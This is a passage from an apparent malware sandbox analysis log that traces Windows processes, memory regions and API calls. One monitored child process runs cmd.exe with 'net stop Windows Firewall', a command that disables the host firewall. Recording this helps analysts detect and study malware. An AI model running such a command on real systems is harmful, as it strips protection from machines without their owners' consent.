returned 65536 [0291.897] LocalFree (hMem=0x704008) returned 0x0 [0291.898] LocalFree (hMem=0x705e58) returned 0x0 [0291.898] exit (_Code=0) Thread: id = 192 os_tid = 0xb14 Thread: id = 193 os_tid = 0x10e8 Process: id = "33" image_name = "locationnotificationwindows.exe" filename = "c:\\windows\\system32\\locationnotificationwindows.exe" page_root = "0x41e4b000" os_pid = "0x1138" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0x35c" cmd_line = "C:\\Windows\\System32\\LocationNotificationWindows.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2833 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2834 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2835 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2836 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2837 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2838 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2839 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2840 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2841 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2842 start_va = 0x7ff6d8b10000 end_va = 0x7ff6d8b1dfff monitored = 0 entry_point = 0x7ff6d8b12e60 region_type = mapped_file name = "locationnotificationwindows.exe" filename = "\\Windows\\System32\\LocationNotificationWindows.exe" (normalized: "c:\\windows\\system32\\locationnotificationwindows.exe") Region: id = 2843 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3041 start_va = 0x420000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3042 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3043 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3311 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3312 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 3313 start_va = 0xf0000 end_va = 0x1adfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3314 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3315 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3316 start_va = 0x520000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3317 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3318 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3319 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3320 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3321 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3322 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3323 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3324 start_va = 0x7ffd48d80000 end_va = 0x7ffd48e11fff monitored = 0 entry_point = 0x7ffd48dca780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 3325 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3326 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3327 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 3328 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3331 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3332 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3333 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3334 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3335 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3336 start_va = 0x5a0000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 3337 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3338 start_va = 0x1c0000 end_va = 0x1f8fff monitored = 0 entry_point = 0x1c12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3339 start_va = 0x5a0000 end_va = 0x727fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 3340 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Thread: id = 202 os_tid = 0x1134 Thread: id = 228 os_tid = 0xc6c Process: id = "34" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x54422000" os_pid = "0xc30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C net stop Windows Firewall" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2852 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2853 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2854 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2855 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2856 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2857 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2858 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2859 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2860 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2861 start_va = 0xd00000 end_va = 0xd51fff monitored = 1 entry_point = 0xd14fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2862 start_va = 0xd60000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 2863 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2864 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2865 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2866 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2867 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 2868 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2869 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 2870 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2871 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2872 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2873 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2874 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2875 start_va = 0x4f0000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 2876 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2877 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2878 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2879 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2880 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2963 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2964 start_va = 0x4f0000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 2965 start_va = 0x540000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2966 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2967 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 2968 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2969 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2970 start_va = 0x840000 end_va = 0xb76fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 203 os_tid = 0x564 [0292.540] GetModuleHandleA (lpModuleName=0x0) returned 0xd00000 [0292.540] __set_app_type (_Type=0x1) [0292.540] __p__fmode () returned 0x74ac4d6c [0292.540] __p__commode () returned 0x74ac5b1c [0292.540] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd15200) returned 0x0 [0292.540] __getmainargs (in: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0, _DoWildCard=0, _StartInfo=0xd260fc | out: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0) returned 0 [0292.540] GetCurrentThreadId () returned 0x564 [0292.541] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x564) returned 0x84 [0292.541] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0292.541] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadUILanguage") returned 0x74f72510 [0292.541] SetThreadUILanguage (LangId=0x0) returned 0x409 [0292.547] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0292.547] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0292.548] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0292.548] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0292.548] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0292.548] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0292.548] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0292.548] GetConsoleOutputCP () returned 0x1b5 [0292.548] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0292.549] SetConsoleCtrlHandler (HandlerRoutine=0xd20e40, Add=1) returned 1 [0292.549] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.549] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0292.549] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.549] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0292.550] _get_osfhandle (_FileHandle=1) returned 0x3c [0292.550] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0292.550] _get_osfhandle (_FileHandle=0) returned 0x38 [0292.550] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0292.550] _get_osfhandle (_FileHandle=0) returned 0x38 [0292.550] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0292.551] GetEnvironmentStringsW () returned 0x547cf0* [0292.551] GetProcessHeap () returned 0x540000 [0292.551] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xa1a) returned 0x548718 [0292.551] FreeEnvironmentStringsA (penv="A") returned 1 [0292.551] GetProcessHeap () returned 0x540000 [0292.551] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x4) returned 0x540550 [0292.551] GetEnvironmentStringsW () returned 0x547cf0* [0292.552] GetProcessHeap () returned 0x540000 [0292.552] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xa1a) returned 0x549140 [0292.552] FreeEnvironmentStringsA (penv="A") returned 1 [0292.552] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0292.552] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0292.552] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0292.552] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0292.552] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0292.552] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0292.552] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0292.552] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0292.553] RegCloseKey (hKey=0x94) returned 0x0 [0292.553] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0292.553] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0292.553] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0292.553] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0292.553] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0292.553] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0292.553] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0292.553] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0292.553] RegCloseKey (hKey=0x94) returned 0x0 [0292.553] time (in: timer=0x0 | out: timer=0x0) returned 0x620b7540 [0292.554] srand (_Seed=0x620b7540) [0292.554] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C net stop Windows Firewall" [0292.554] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C net stop Windows Firewall" [0292.554] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0292.554] GetProcessHeap () returned 0x540000 [0292.554] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x210) returned 0x549b68 [0292.554] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x549b70, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0292.554] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0292.554] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0292.554] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0292.554] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0292.554] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0292.554] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0292.554] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0292.554] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0292.555] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0292.555] _wcsicmp (_String1="PROMPT", 